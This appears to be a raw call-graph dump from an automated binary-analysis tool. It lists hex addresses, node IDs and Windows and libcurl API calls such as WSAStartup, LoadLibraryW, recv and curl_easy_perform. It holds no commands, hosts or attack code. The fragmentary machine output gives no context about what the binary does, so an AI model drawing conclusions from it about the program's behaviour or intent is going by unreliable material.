7ff8a93187f0 AcquireSRWLockExclusive 93692->93695 93696 7ff8a931880a 93695->93696 93697 7ff8a931882e ReleaseSRWLockExclusive 93695->93697 93720 7ff8a9319070 93696->93720 93703 7ff8a93562c0 calloc 93697->93703 93700 7ff8a9318816 93700->93697 93702 7ff8a931881a ReleaseSRWLockExclusive 93700->93702 93701 7ff8a9318845 93701->93694 93702->93694 93704 7ff8a93562e6 93703->93704 93705 7ff8a93562f7 93703->93705 93704->93701 93726 7ff8a9302560 calloc 93705->93726 93707 7ff8a9356322 93708 7ff8a9356328 93707->93708 93709 7ff8a9356347 __acrt_iob_func __acrt_iob_func __acrt_iob_func 93707->93709 93727 7ff8a93400f0 6 API calls 93708->93727 93728 7ff8a9332da0 memset 93709->93728 93713 7ff8a9356438 93729 7ff8a93649f0 realloc GetEnvironmentVariableA realloc free free 93713->93729 93715 7ff8a9356473 93716 7ff8a935647d 93715->93716 93730 7ff8a93649f0 realloc GetEnvironmentVariableA realloc free free 93715->93730 93731 7ff8a93226c0 free free free free free 93716->93731 93719 7ff8a9356548 93719->93701 93721 7ff8a9319092 93720->93721 93725 7ff8a9319103 93720->93725 93722 7ff8a93190ea 93721->93722 93723 7ff8a9319096 calloc 93721->93723 93722->93725 93732 7ff8a934fe30 93722->93732 93723->93722 93725->93700 93726->93707 93728->93713 93729->93715 93730->93716 93731->93719 93733 7ff8a934fe4e WSAStartup 93732->93733 93734 7ff8a934fe96 93732->93734 93735 7ff8a934fe79 93733->93735 93736 7ff8a934fe62 93733->93736 93765 7ff8a9314840 93734->93765 93739 7ff8a9369e10 8 API calls 93735->93739 93736->93734 93738 7ff8a934fe73 WSACleanup 93736->93738 93738->93735 93743 7ff8a934fe8e 93739->93743 93740 7ff8a934fe9b 93741 7ff8a93500ab 93740->93741 93742 7ff8a934fea3 GetModuleHandleW 93740->93742 93746 7ff8a9369e10 8 API calls 93741->93746 93744 7ff8a934feca 93742->93744 93745 7ff8a934fed6 GetProcAddress wcspbrk 93742->93745 93743->93725 93750 7ff8a935c700 21 API calls 93744->93750 93747 7ff8a934ff3d 93745->93747 93748 7ff8a934ff15 93745->93748 93749 7ff8a93500bb 93746->93749 93752 7ff8a934ff6c GetSystemDirectoryW 93747->93752 93753 7ff8a934ff42 GetProcAddress 93747->93753 93751 7ff8a934ff2f LoadLibraryW 93748->93751 93757 7ff8a934ff1d 93748->93757 93749->93725 93754 7ff8a9350083 QueryPerformanceFrequency 93750->93754 93751->93757 93756 7ff8a934ff89 malloc 93752->93756 93752->93757 93753->93752 93755 7ff8a934ff57 LoadLibraryExW 93753->93755 93754->93741 93755->93757 93759 7ff8a935001d free 93756->93759 93760 7ff8a934ffa2 GetSystemDirectoryW 93756->93760 93757->93744 93758 7ff8a935004a GetProcAddress 93757->93758 93758->93744 93761 7ff8a935005f 93758->93761 93759->93757 93760->93759 93762 7ff8a934ffb2 93760->93762 93761->93744 93763 7ff8a9350008 93762->93763 93764 7ff8a9350014 LoadLibraryW 93762->93764 93763->93759 93764->93763 93766 7ff8a9314852 93765->93766 93767 7ff8a93148d5 93765->93767 93768 7ff8a935c700 21 API calls 93766->93768 93767->93740 93769 7ff8a9314872 93768->93769 93774 7ff8a934fc30 GetModuleHandleW 93769->93774 93771 7ff8a931488b 93772 7ff8a9314897 GetProcAddressForCaller 93771->93772 93773 7ff8a93148ac 93771->93773 93772->93773 93773->93740 93775 7ff8a934fc5a GetProcAddress wcspbrk 93774->93775 93776 7ff8a934fc52 93774->93776 93777 7ff8a934fcbc 93775->93777 93778 7ff8a934fc87 LoadLibraryW 93775->93778 93776->93771 93780 7ff8a934fcc1 GetProcAddress 93777->93780 93781 7ff8a934fcf3 GetSystemDirectoryW 93777->93781 93778->93777 93780->93781 93784 7ff8a934fcd6 93780->93784 93782 7ff8a934fdbc 93781->93782 93783 7ff8a934fd0d malloc 93781->93783 93782->93771 93786 7ff8a934fdae free 93783->93786 93787 7ff8a934fd40 GetSystemDirectoryW 93783->93787 93784->93781 93786->93782 93787->93786 93788 7ff8a934fd50 93787->93788 93789 7ff8a934fd98 93788->93789 93790 7ff8a934fda5 LoadLibraryW 93788->93790 93789->93786 93790->93789 93791 7ff8a933aa52 93792 7ff8a933aa68 93791->93792 93793 7ff8a933aac8 93792->93793 93795 7ff8a933ad04 93792->93795 93847 7ff8a9354870 93793->93847 93797 7ff8a933ad2f 93795->93797 93798 7ff8a933ad63 93795->93798 93799 7ff8a9353b60 2 API calls 93797->93799 93800 7ff8a9353b60 2 API calls 93798->93800 93802 7ff8a933ad38 93799->93802 93803 7ff8a933ad6c 93800->93803 93893 7ff8a9337650 18 API calls 93802->93893 93894 7ff8a9337650 18 API calls 93803->93894 93804 7ff8a933acb7 93809 7ff8a93398c0 459 API calls 93804->93809 93805 7ff8a933aaf0 93805->93804 93808 7ff8a933ab02 93805->93808 93810 7ff8a933ac63 93808->93810 93812 7ff8a933ab1f 93808->93812 93811 7ff8a933acf0 free 93809->93811 93810->93811 93814 7ff8a933ac7c 93810->93814 93813 7ff8a933ad56 93811->93813 93815 7ff8a933ac0f 93812->93815 93818 7ff8a933abea free 93812->93818 93819 7ff8a933ab35 93812->93819 93816 7ff8a930cfb0 10 API calls 93813->93816 93839 7ff8a9339ee0 93813->93839 93817 7ff8a9353b60 2 API calls 93814->93817 93870 7ff8a93398c0 93815->93870 93816->93839 93820 7ff8a933ac85 93817->93820 93818->93815 93821 7ff8a933ab3e free 93819->93821 93822 7ff8a933ab8d free 93819->93822 93892 7ff8a9337650 18 API calls 93820->93892 93889 7ff8a9353d80 45 API calls 93821->93889 93822->93813 93829 7ff8a933b0e4 93830 7ff8a933aca3 free 93830->93813 93831 7ff8a933ab6a 93831->93822 93836 7ff8a93398c0 459 API calls 93831->93836 93834 7ff8a933ac31 93834->93811 93838 7ff8a933ac3c free 93834->93838 93840 7ff8a933ab82 93836->93840 93837 7ff8a9339840 20 API calls 93837->93839 93838->93813 93839->93829 93839->93837 93842 7ff8a9314a70 14 API calls 93839->93842 93845 7ff8a933ba90 free free 93839->93845 93846 7ff8a93398c0 459 API calls 93839->93846 93883 7ff8a930cfb0 93839->93883 93895 7ff8a930a330 93839->93895 93914 7ff8a933f410 QueryPerformanceCounter GetTickCount 93839->93914 93915 7ff8a9337540 18 API calls 93839->93915 93916 7ff8a933f2d0 17 API calls 93839->93916 93840->93811 93840->93822 93842->93839 93845->93839 93846->93839 93848 7ff8a93548a3 93847->93848 93851 7ff8a93548e5 93848->93851 93863 7ff8a933aad7 93848->93863 93917 7ff8a9355010 93848->93917 93850 7ff8a935492c 93850->93863 93928 7ff8a933f2d0 17 API calls 93850->93928 93851->93850 93851->93863 93927 7ff8a93403f0 34 API calls 93851->93927 93854 7ff8a9354954 93854->93863 93929 7ff8a934db30 20 API calls 93854->93929 93856 7ff8a9354972 93857 7ff8a9354985 93856->93857 93858 7ff8a9354a42 93856->93858 93856->93863 93859 7ff8a930cfb0 10 API calls 93857->93859 93860 7ff8a9354a80 93858->93860 93866 7ff8a9354a67 93858->93866 93862 7ff8a9354993 93859->93862 93933 7ff8a933f2d0 17 API calls 93860->93933 93862->93863 93864 7ff8a9354a0c 93862->93864 93865 7ff8a93549b0 93862->93865 93863->93805 93890 7ff8a9354710 19 API calls 93863->93890 93931 7ff8a9314a70 14 API calls 93864->93931 93930 7ff8a9314a70 14 API calls 93865->93930 93932 7ff8a9314a70 14 API calls 93866->93932 93871 7ff8a93398eb 93870->93871 93872 7ff8a93398f2 93870->93872 93891 7ff8a9353d80 45 API calls 93871->93891 94304 7ff8a93026f0 93872->94304 93884 7ff8a930cfe0 93883->93884 93885 7ff8a930cfe5 93884->93885 93886 7ff8a9353b60 2 API calls 93884->93886 93887 7ff8a9369e10 8 API calls 93885->93887 93886->93885 93888 7ff8a930d0c0 93887->93888 93888->93839 93889->93831 93890->93805 93891->93834 93892->93830 93893->93813 93894->93813 93896 7ff8a930a339 93895->93896 93907 7ff8a930a46b 93895->93907 93897 7ff8a930a46d 93896->93897 93898 7ff8a930a427 93896->93898 93896->93907 93899 7ff8a9314b60 18 API calls 93897->93899 93900 7ff8a9314b60 18 API calls 93898->93900 93901 7ff8a930a47f 93899->93901 93902 7ff8a930a44e 93900->93902 94320 7ff8a930bae0 93901->94320 94311 7ff8a930b4c0 93902->94311 93906 7ff8a930a4aa 94338 7ff8a9308c90 93906->94338 93907->93839 93911 7ff8a9308c90 29 API calls 93912 7ff8a930a4c1 93911->93912 94342 7ff8a9355720 32 API calls 93912->94342 93914->93839 93915->93839 93916->93839 93934 7ff8a9338030 93917->93934 93919 7ff8a9355263 93919->93851 93922 7ff8a93551d8 93922->93919 93924 7ff8a9314b60 18 API calls 93922->93924 93923 7ff8a935505d 93923->93919 93923->93922 93951 7ff8a9354bd0 93923->93951 93957 7ff8a9354f60 93923->93957 93925 7ff8a935525b 93924->93925 93965 7ff8a9340010 20 API calls 93925->93965 93927->93850 93928->93854 93929->93856 93930->93863 93931->93863 93932->93863 93933->93863 93935 7ff8a933807a 93934->93935 93936 7ff8a9338061 93934->93936 93938 7ff8a933809d 93935->93938 93939 7ff8a9338084 93935->93939 93966 7ff8a9314a70 14 API calls 93936->93966 93941 7ff8a93380bf 93938->93941 93942 7ff8a93380a6 93938->93942 93967 7ff8a9314a70 14 API calls 93939->93967 93943 7ff8a93380f9 93941->93943 93945 7ff8a93380d4 free 93941->93945 93968 7ff8a9314a70 14 API calls 93942->93968 93946 7ff8a9338109 malloc 93943->93946 93947 7ff8a9338070 93943->93947 93945->93943 93948 7ff8a9338139 93946->93948 93949 7ff8a933814b 93946->93949 93947->93923 93969 7ff8a9314a70 14 API calls 93948->93969 93949->93947 93953 7ff8a9354bfd 93951->93953 93952 7ff8a9354cb9 93956 7ff8a9354d15 93952->93956 93973 7ff8a9309740 93952->93973 93953->93952 93970 7ff8a93096b0 93953->93970 93956->93923 93958 7ff8a9354f9f 93957->93958 93959 7ff8a9354f97 93957->93959 93960 7ff8a9343a60 33 API calls 93958->93960 93962 7ff8a9354f9d 93958->93962 94274 7ff8a9343a60 93959->94274 93960->93962 94283 7ff8a9314e50 18 API calls 93962->94283 93963 7ff8a9354ff1 93963->93923 93965->93919 93966->93947 93967->93947 93968->93947 93969->93949 93995 7ff8a9363c50 93970->93995 93974 7ff8a9309776 93973->93974 93986 7ff8a930978b 93973->93986 93975 7ff8a9353b60 2 API calls 93974->93975 93974->93986 93978 7ff8a93097bd 93975->93978 93976 7ff8a9369e10 8 API calls 93977 7ff8a930979e 93976->93977 93977->93956 93979 7ff8a93097da 93978->93979 93980 7ff8a930982e 93978->93980 94249 7ff8a930ce40 10 API calls 93979->94249 94250 7ff8a930cf00 10 API calls 93980->94250 93983 7ff8a9309837 93984 7ff8a930983c 93983->93984 93985 7ff8a93097e2 93983->93985 94251 7ff8a9314a70 14 API calls 93984->94251 93985->93986 93988 7ff8a9309866 93985->93988 93989 7ff8a9309855 93985->93989 93992 7ff8a9314bb0 14 API calls 93985->93992 94232 7ff8a9305ce0 93985->94232 94242 7ff8a9363cf0 93985->94242 93986->93976 93990 7ff8a9314bb0 14 API calls 93988->93990 93991 7ff8a9314bb0 14 API calls 93989->93991 93990->93986 93991->93986 93992->93985 94000 7ff8a935f4f0 93995->94000 93997 7ff8a9314bb0 14 API calls 93998 7ff8a93096d5 93997->93998 93998->93952 94001 7ff8a935f550 94000->94001 94004 7ff8a935f56a 94000->94004 94002 7ff8a935f556 94001->94002 94001->94004 94003 7ff8a9314b60 18 API calls 94002->94003 94031 7ff8a935f565 94003->94031 94006 7ff8a935f5c2 realloc 94004->94006 94015 7ff8a935f5fe 94004->94015 94034 7ff8a935f651 94004->94034 94035 7ff8a935f571 94004->94035 94005 7ff8a9314b60 18 API calls 94005->94031 94007 7ff8a935f5e2 94006->94007 94006->94015 94037 7ff8a9314a70 14 API calls 94007->94037 94008 7ff8a935f9c8 memmove memmove 94010 7ff8a935f9fe 94008->94010 94012 7ff8a9369e10 8 API calls 94010->94012 94011 7ff8a935c700 21 API calls 94013 7ff8a935f8ed 94011->94013 94014 7ff8a935fa37 94012->94014 94018 7ff8a935f8fd 94013->94018 94019 7ff8a9314b60 18 API calls 94013->94019 94014->93997 94016 7ff8a935f645 94015->94016 94017 7ff8a935f653 94015->94017 94015->94034 94020 7ff8a9314b60 18 API calls 94016->94020 94021 7ff8a9314b60 18 API calls 94017->94021 94018->94008 94018->94010 94019->94018 94020->94034 94021->94034 94022 7ff8a935f906 94025 7ff8a935f92d 94022->94025 94022->94035 94023 7ff8a935f764 realloc 94024 7ff8a935f95d 94023->94024 94023->94034 94073 7ff8a9314a70 14 API calls 94024->94073 94054 7ff8a934e4c0 GetLastError _errno 94025->94054 94028 7ff8a935f797 memmove 94028->94034 94029 7ff8a935f7cb memmove 94029->94034 94031->94011 94031->94018 94032 7ff8a9314b60 18 API calls 94032->94031 94034->94022 94034->94023 94034->94028 94034->94029 94034->94031 94034->94035 94036 7ff8a9314b60 18 API calls 94034->94036 94038 7ff8a9361420 94034->94038 94035->94005 94036->94034 94037->94031 94039 7ff8a936144e 94038->94039 94040 7ff8a930cfb0 10 API calls 94039->94040 94050 7ff8a936148e 94039->94050 94053 7ff8a9361457 94039->94053 94042 7ff8a936147a 94040->94042 94041 7ff8a9361516 94041->94053 94187 7ff8a93620b0 66 API calls 94041->94187 94044 7ff8a9361552 94042->94044 94074 7ff8a93615d0 94042->94074 94043 7ff8a930cfb0 10 API calls 94043->94050 94044->94053 94189 7ff8a9314a70 14 API calls 94044->94189 94048 7ff8a9342690 19 API calls 94048->94050 94050->94041 94050->94043 94050->94044 94050->94048 94051 7ff8a936155c WSAGetLastError 94050->94051 94050->94053 94129 7ff8a9361a60 94050->94129 94188 7ff8a9314a70 14 API calls 94051->94188 94053->94034 94057 7ff8a934e507 94054->94057 94071 7ff8a934e500 94054->94071 94055 7ff8a934e533 94224 7ff8a934f5b0 94055->94224 94056 7ff8a9369e10 8 API calls 94058 7ff8a934ea3e 94056->94058 94057->94055 94060 7ff8a934e9d1 94057->94060 94058->94032 94062 7ff8a9334eb0 8 API calls 94060->94062 94070 7ff8a934e58d 94062->94070 94063 7ff8a934e9eb 94065 7ff8a9334eb0 8 API calls 94063->94065 94064 7ff8a934e573 94066 7ff8a9334eb0 8 API calls 94064->94066 94067 7ff8a934e9fb _errno 94065->94067 94066->94070 94068 7ff8a934ea0e _errno 94067->94068 94069 7ff8a934ea17 GetLastError 94067->94069 94068->94069 94069->94071 94072 7ff8a934ea22 SetLastError 94069->94072 94070->94067 94071->94056 94072->94071 94073->94031 94075 7ff8a9361613 94074->94075 94076 7ff8a935c700 21 API calls 94075->94076 94077 7ff8a936164b 94076->94077 94078 7ff8a936165e 94077->94078 94079 7ff8a9314b60 18 API calls 94077->94079 94080 7ff8a93616ae 94078->94080 94081 7ff8a9361664 GetModuleHandleW GetProcAddress 94078->94081 94079->94078 94085 7ff8a935c700 21 API calls 94080->94085 94088 7ff8a93616bf 94080->94088 94081->94080 94082 7ff8a9361686 94081->94082 94083 7ff8a935c700 21 API calls 94082->94083 94086 7ff8a93616e3 94085->94086 94086->94088 94095 7ff8a9361719 94088->94095 94198 7ff8a93653d0 17 API calls 94088->94198 94130 7ff8a9361a9e 94129->94130 94131 7ff8a9361b0b 94130->94131 94132 7ff8a9361ae3 malloc 94130->94132 94156 7ff8a9362061 94130->94156 94133 7ff8a9361b3e 94131->94133 94134 7ff8a9361b14 malloc 94131->94134 94132->94131 94132->94156 94135 7ff8a9361b51 realloc 94133->94135 94139 7ff8a9361baa 94133->94139 94134->94133 94134->94156 94136 7ff8a9361b66 94135->94136 94135->94139 94210 7ff8a9314a70 14 API calls 94136->94210 94138 7ff8a9361b75 94142 7ff8a9369e10 8 API calls 94138->94142 94144 7ff8a9361de2 94139->94144 94154 7ff8a9361bfa 94139->94154 94139->94156 94140 7ff8a9361c0a malloc 94141 7ff8a9361c9e memmove 94140->94141 94140->94156 94145 7ff8a9361cff free 94141->94145 94211 7ff8a9314a70 14 API calls 94144->94211 94145->94154 94145->94156 94147 7ff8a9361df1 94212 7ff8a9314a70 14 API calls 94147->94212 94148 7ff8a9361fd2 94149 7ff8a934e4c0 17 API calls 94148->94149 94148->94156 94158 7ff8a9361ff2 94149->94158 94154->94140 94154->94147 94154->94148 94161 7ff8a9361dbd memmove 94154->94161 94162 7ff8a9361de0 94154->94162 94161->94154 94161->94162 94162->94156 94163 7ff8a9361f8b 94162->94163 94167 7ff8a9361f3e 94162->94167 94170 7ff8a9361eb1 94162->94170 94163->94156 94164 7ff8a9361fb3 94163->94164 94218 7ff8a9362470 117 API calls 94163->94218 94164->94156 94171 7ff8a934e4c0 17 API calls 94167->94171 94172 7ff8a9361f3c 94170->94172 94176 7ff8a9361ec7 memset 94170->94176 94187->94053 94188->94053 94189->94053 94198->94095 94210->94138 94211->94147 94212->94162 94218->94164 94225 7ff8a934f5de FormatMessageW 94224->94225 94230 7ff8a934f5d7 94224->94230 94226 7ff8a934f61e wcstombs 94225->94226 94227 7ff8a934f63f strchr 94225->94227 94229 7ff8a934f636 94226->94229 94227->94230 94228 7ff8a9369e10 8 API calls 94231 7ff8a934e561 94228->94231 94229->94227 94230->94228 94231->94063 94231->94064 94233 7ff8a9305d07 94232->94233 94234 7ff8a9305d67 94232->94234 94236 7ff8a9314bb0 14 API calls 94233->94236 94235 7ff8a9369e10 8 API calls 94234->94235 94237 7ff8a9305d84 94235->94237 94238 7ff8a9305d2c 94236->94238 94237->93985 94238->94234 94252 7ff8a933c2d0 ioctlsocket 94238->94252 94240 7ff8a9305d48 94240->94234 94241 7ff8a9305d4c recv 94240->94241 94241->94234 94243 7ff8a9363dab 94242->94243 94244 7ff8a9363d17 94242->94244 94243->93985 94253 7ff8a935fac0 94244->94253 94246 7ff8a9314bb0 14 API calls 94247 7ff8a9363d5b 94246->94247 94247->93985 94249->93985 94250->93983 94251->93986 94252->94240 94254 7ff8a935fb0c 94253->94254 94255 7ff8a935fb15 94253->94255 94257 7ff8a9369e10 8 API calls 94254->94257 94256 7ff8a9314b60 18 API calls 94255->94256 94259 7ff8a935fb34 94255->94259 94256->94259 94258 7ff8a935fbf6 94257->94258 94258->94246 94259->94254 94260 7ff8a935fc7e 94259->94260 94261 7ff8a935fbb1 94259->94261 94266 7ff8a935fc08 94259->94266 94260->94254 94264 7ff8a935f4f0 230 API calls 94260->94264 94262 7ff8a934e4c0 17 API calls 94261->94262 94263 7ff8a935fbc2 94262->94263 94273 7ff8a9314a70 14 API calls 94263->94273 94267 7ff8a935fd6c 94264->94267 94266->94260 94269 7ff8a935fcff 94266->94269 94271 7ff8a935fccb 94266->94271 94267->94254 94268 7ff8a9314bb0 14 API calls 94267->94268 94268->94254 94269->94254 94269->94260 94270 7ff8a9314b60 18 API calls 94269->94270 94270->94260 94271->94260 94272 7ff8a9314b60 18 API calls 94271->94272 94272->94260 94273->94254 94275 7ff8a9343a89 94274->94275 94276 7ff8a9343a92 94274->94276 94291 7ff8a9344500 7 API calls 94275->94291 94279 7ff8a9343a9e 94276->94279 94284 7ff8a9342d70 94276->94284 94278 7ff8a9343a8e 94278->94276 94281 7ff8a9343ad4 94278->94281 94292 7ff8a9314e50 18 API calls 94279->94292 94281->93962 94283->93963 94285 7ff8a9342dc3 94284->94285 94286 7ff8a9342da1 94284->94286 94287 7ff8a9342dcc 94285->94287 94293 7ff8a9323280 94285->94293 94286->94285 94288 7ff8a9342db3 94286->94288 94287->94279 94301 7ff8a9314980 fwrite fwrite 94288->94301 94291->94278 94292->94281 94294 7ff8a93232b0 94293->94294 94295 7ff8a932330d 94293->94295 94294->94295 94296 7ff8a93232bf 94294->94296 94295->94287 94302 7ff8a9323460 8 API calls 94296->94302 94298 7ff8a93232e4 94303 7ff8a9314e50 18 API calls 94298->94303 94300 7ff8a9323300 94300->94295 94301->94285 94302->94298 94303->94300 94305 7ff8a9302705 94304->94305 94306 7ff8a9302720 94304->94306 94305->94306 94307 7ff8a9302714 94305->94307 94310 7ff8a9314930 WaitForSingleObjectEx CloseHandle 94307->94310 94309 7ff8a9302719 94309->94306 94310->94309 94313 7ff8a930b4eb 94311->94313 94312 7ff8a930b690 94312->93907 94313->94312 94314 7ff8a930b9f0 259 API calls 94313->94314 94316 7ff8a930b511 94313->94316 94314->94316 94316->94312 94317 7ff8a930bae0 27 API calls 94316->94317 94318 7ff8a9308c90 29 API calls 94316->94318 94343 7ff8a9355720 32 API calls 94316->94343 94344 7ff8a930be20 14 API calls 94316->94344 94317->94316 94318->94316 94321 7ff8a930baf9 94320->94321 94322 7ff8a930a495 94320->94322 94323 7ff8a930bb08 94321->94323 94345 7ff8a9324ff0 free free 94321->94345 94322->93906 94330 7ff8a930b9f0 94322->94330 94346 7ff8a932e150 8 API calls 94323->94346 94331 7ff8a930bae0 27 API calls 94330->94331 94333 7ff8a930ba07 94331->94333 94332 7ff8a930ba10 94332->93906 94333->94332 94334 7ff8a930ba4e 94333->94334 94335 7ff8a9309740 232 API calls 94333->94335 94336 7ff8a930ba85 94334->94336 94337 7ff8a9309740 232 API calls 94334->94337 94335->94334 94336->93906 94337->94336 94339 7ff8a9308cba 94338->94339 94340 7ff8a9308cb1 94338->94340 94339->93911 94347 7ff8a93055f0 94340->94347 94344->94316 94345->94323 94348 7ff8a9314bb0 14 API calls 94347->94348 94349 7ff8a9305612 94348->94349 94356 7ff8a9305b30 94349->94356 94352 7ff8a930563f 94352->94339 94357 7ff8a9305b4a 94356->94357 94361 7ff8a930561d 94356->94361 94359 7ff8a9305b70 94357->94359 94370 7ff8a93088f0 free 94357->94370 94359->94361 94371 7ff8a93088f0 free 94359->94371 94361->94352 94362 7ff8a930c8f0 94361->94362 94363 7ff8a9314bb0 14 API calls 94362->94363 94364 7ff8a930c91b 94363->94364 94365 7ff8a9305633 94364->94365 94372 7ff8a9363940 94364->94372 94369 7ff8a93088f0 free 94365->94369 94369->94352 94370->94359 94371->94361 94378 7ff8a9365f80 94372->94378 94379 7ff8a9365f96 94378->94379 94380 7ff8a9365ff1 94378->94380 94429 7ff8a9342a90 94430 7ff8a9342aed 94429->94430 94431 7ff8a9342ad1 94429->94431 94432 7ff8a9342b51 94430->94432 94436 7ff8a9342af9 94430->94436 94431->94430 94460 7ff8a933ef80 94431->94460 94434 7ff8a9342ba4 94432->94434 94435 7ff8a9342b63 94432->94435 94438 7ff8a9342c0c 94434->94438 94444 7ff8a9342bf3 94434->94444 94464 7ff8a9314e50 18 API calls 94435->94464 94451 7ff8a9342b4a 94436->94451 94463 7ff8a9314e50 18 API calls 94436->94463 94439 7ff8a9342ca8 94438->94439 94441 7ff8a9342c7f 94438->94441 94442 7ff8a9342c60 94438->94442 94445 7ff8a9342d39 94439->94445 94446 7ff8a9342cd2 94439->94446 94439->94451 94454 7ff8a93155f0 94441->94454 94466 7ff8a9314e50 18 API calls 94442->94466 94465 7ff8a9314a70 14 API calls 94444->94465 94445->94451 94468 7ff8a9314a70 14 API calls 94445->94468 94450 7ff8a9314b60 18 API calls 94446->94450 94446->94451 94450->94451 94455 7ff8a931562a 94454->94455 94457 7ff8a9315657 94455->94457 94469 7ff8a93159d0 94455->94469 94458 7ff8a931567f 94457->94458 94459 7ff8a93159d0 104 API calls 94457->94459 94467 7ff8a9314e50 18 API calls 94458->94467 94459->94458 94461 7ff8a9353b60 2 API calls 94460->94461 94462 7ff8a933efa3 94461->94462 94462->94430 94463->94451 94464->94451 94465->94451 94466->94451 94467->94439 94468->94451 94470 7ff8a9315a0e 94469->94470 94471 7ff8a93159fc 94469->94471 94472 7ff8a9315a5c 94470->94472 94473 7ff8a9315a22 94470->94473 94480 7ff8a9315ab9 94470->94480 94471->94470 94502 7ff8a9315af0 102 API calls 94471->94502 94487 7ff8a9315c60 94472->94487 94503 7ff8a93158a0 calloc 94473->94503 94477 7ff8a9315a8f 94479 7ff8a9315ac5 94477->94479 94481 7ff8a9315a9f 94477->94481 94478 7ff8a9315a39 94478->94479 94504 7ff8a9315af0 102 API calls 94478->94504 94479->94457 94506 7ff8a9315970 free free 94480->94506 94505 7ff8a93158a0 calloc 94481->94505 94484 7ff8a9315a54 94484->94479 94484->94480 94486 7ff8a9315a5a 94484->94486 94486->94479 94488 7ff8a9315c7b 94487->94488 94490 7ff8a9315c86 94487->94490 94488->94477 94489 7ff8a9315cf2 94489->94477 94490->94489 94492 7ff8a9315e35 94490->94492 94494 7ff8a9315e1c 94490->94494 94497 7ff8a9315e00 94490->94497 94507 7ff6cabb5860 94490->94507 94528 7ff8a9314e50 18 API calls 94490->94528 94493 7ff8a9315e64 94492->94493 94495 7ff8a9315e4e 94492->94495 94532 7ff8a9314e50 18 API calls 94493->94532 94530 7ff8a9314a70 14 API calls 94494->94530 94531 7ff8a9314a70 14 API calls 94495->94531 94529 7ff8a9314a70 14 API calls 94497->94529 94502->94470 94503->94478 94504->94484 94505->94484 94506->94479 94508 7ff6cabb58af 94507->94508 94509 7ff6cabb58b2 curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt 94507->94509 94508->94509 94510 7ff6cabb5933 curl_easy_setopt 94509->94510 94513 7ff6cabb5984 curl_easy_setopt curl_easy_perform 94510->94513 94514 7ff6cabb5a89 94513->94514 94515 7ff6cabb59cc curl_easy_strerror 94513->94515 94548 7ff6cabb7c00 71 API calls 4 library calls 94514->94548 94517 7ff6cabb59f0 94515->94517 94517->94517 94547 7ff6cabbb6c0 71 API calls 94517->94547 94518 7ff6cabb5a60 numpunct 94520 7ff6cabe3b30 _Strcoll 8 API calls 94518->94520 94521 7ff6cabb5a75 94520->94521 94521->94490 94522 7ff6cabb5ace 94524 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 94522->94524 94523 7ff6cabb5a07 94523->94518 94523->94522 94525 7ff6cabb5ad3 94524->94525 94533 7ff6cabb7880 94525->94533 94527 7ff6cabb5afb 94527->94490 94528->94490 94529->94489 94530->94489 94531->94489 94532->94489 94534 7ff6cabb78c5 94533->94534 94537 7ff6cabb78da 94534->94537 94553 7ff6cabb8f00 8 API calls _Strcoll 94534->94553 94535 7ff6cabb7910 94539 7ff6cabb7981 94535->94539 94541 7ff6cabb79c4 94535->94541 94537->94535 94549 7ff6cabb6bc0 94537->94549 94538 7ff6cabb7992 94538->94527 94539->94538 94554 7ff6cabb9060 71 API calls Concurrency::cancel_current_task 94539->94554 94555 7ff6cabb1d30 71 API calls 4 library calls 94541->94555 94543 7ff6cabb7a06 94548->94523 94550 7ff6cabb6c63 ctype 94549->94550 94551 7ff6cabb6be8 ctype 94549->94551 94550->94551 94557 7ff6cabee85c 94550->94557 94551->94535 94553->94537 94554->94538 94555->94543 94558 7ff6cabee88c 94557->94558 94583 7ff8a935fed0 94584 7ff8a9314840 32 API calls 94583->94584 94585 7ff8a935fed9 94584->94585 94586 7ff8a9363990 94587 7ff8a93639b8 94586->94587 94590 7ff8a93639c3 94586->94590 94588 7ff8a9314bb0 14 API calls 94589 7ff8a9363a26 94588->94589 94591 7ff8a9363a4c 94589->94591 94592 7ff8a9363a31 94589->94592 94590->94587 94590->94588 94594 7ff8a9363a58 94591->94594 94595 7ff8a9363ad6 94591->94595 94612 7ff8a93657e0 16 API calls 94592->94612 94599 7ff8a9363a5f 94594->94599 94600 7ff8a9363a80 94594->94600 94596 7ff8a9363ada 94595->94596 94597 7ff8a9363af0 94595->94597 94615 7ff8a9314a70 14 API calls 94596->94615 94603 7ff8a9363b1b 94597->94603 94606 7ff8a9363b05 94597->94606 94598 7ff8a9363a42 94598->94591 94602 7ff8a9363b47 94598->94602 94613 7ff8a9314a70 14 API calls 94599->94613 94609 7ff8a9363a6e 94600->94609 94614 7ff8a9314a70 14 API calls 94600->94614 94605 7ff8a9314bb0 14 API calls 94602->94605 94611 7ff8a9361420 224 API calls 94603->94611 94605->94587 94616 7ff8a9314a70 14 API calls 94606->94616 94609->94602 94610 7ff8a9353b60 2 API calls 94609->94610 94610->94602 94611->94609 94612->94598 94613->94609 94614->94609 94615->94609 94616->94609 94617 7ff6cabf3586 94629 7ff6cabf2bcc 94617->94629 94654 7ff6cabf5f90 94629->94654 94631 7ff6cabf2bd5 94660 7ff6cabf2714 94631->94660 94669 7ff6cabf5ff0 94654->94669 94657 7ff6cabf5f9e 94657->94631 94658 7ff6cabf2714 BuildCatchObjectHelperInternal 69 API calls 94659 7ff6cabf5fa8 94658->94659 94680 7ff6cabfcae8 EnterCriticalSection LeaveCriticalSection BuildCatchObjectHelperInternal 94660->94680 94662 7ff6cabf271d 94663 7ff6cabf272c 94662->94663 94681 7ff6cabfcb38 69 API calls 4 library calls 94662->94681 94665 7ff6cabf2735 IsProcessorFeaturePresent 94663->94665 94668 7ff6cabf275f BuildCatchObjectHelperInternal 94663->94668 94666 7ff6cabf2744 94665->94666 94682 7ff6cabf158c 14 API calls 3 library calls 94666->94682 94670 7ff6cabf6039 GetLastError 94669->94670 94672 7ff6cabf600f _Strcoll 94669->94672 94673 7ff6cabf604c 94670->94673 94671 7ff6cabf606a SetLastError 94675 7ff6cabf5f99 94671->94675 94672->94675 94678 7ff6cabf5e70 13 API calls 3 library calls 94672->94678 94673->94671 94674 7ff6cabf6067 94673->94674 94679 7ff6cabf5e70 13 API calls 3 library calls 94673->94679 94674->94671 94675->94657 94675->94658 94678->94675 94679->94674 94680->94662 94681->94663 94682->94668 94684 7ff8a933ad9b 94685 7ff8a933ada3 94684->94685 94687 7ff8a933adb1 94684->94687 94686 7ff8a93398c0 459 API calls 94685->94686 94686->94687 94690 7ff8a933adce 94687->94690 94692 7ff8a933ae06 94687->94692 94704 7ff8a933ba90 free free 94687->94704 94691 7ff8a930cfb0 10 API calls 94690->94691 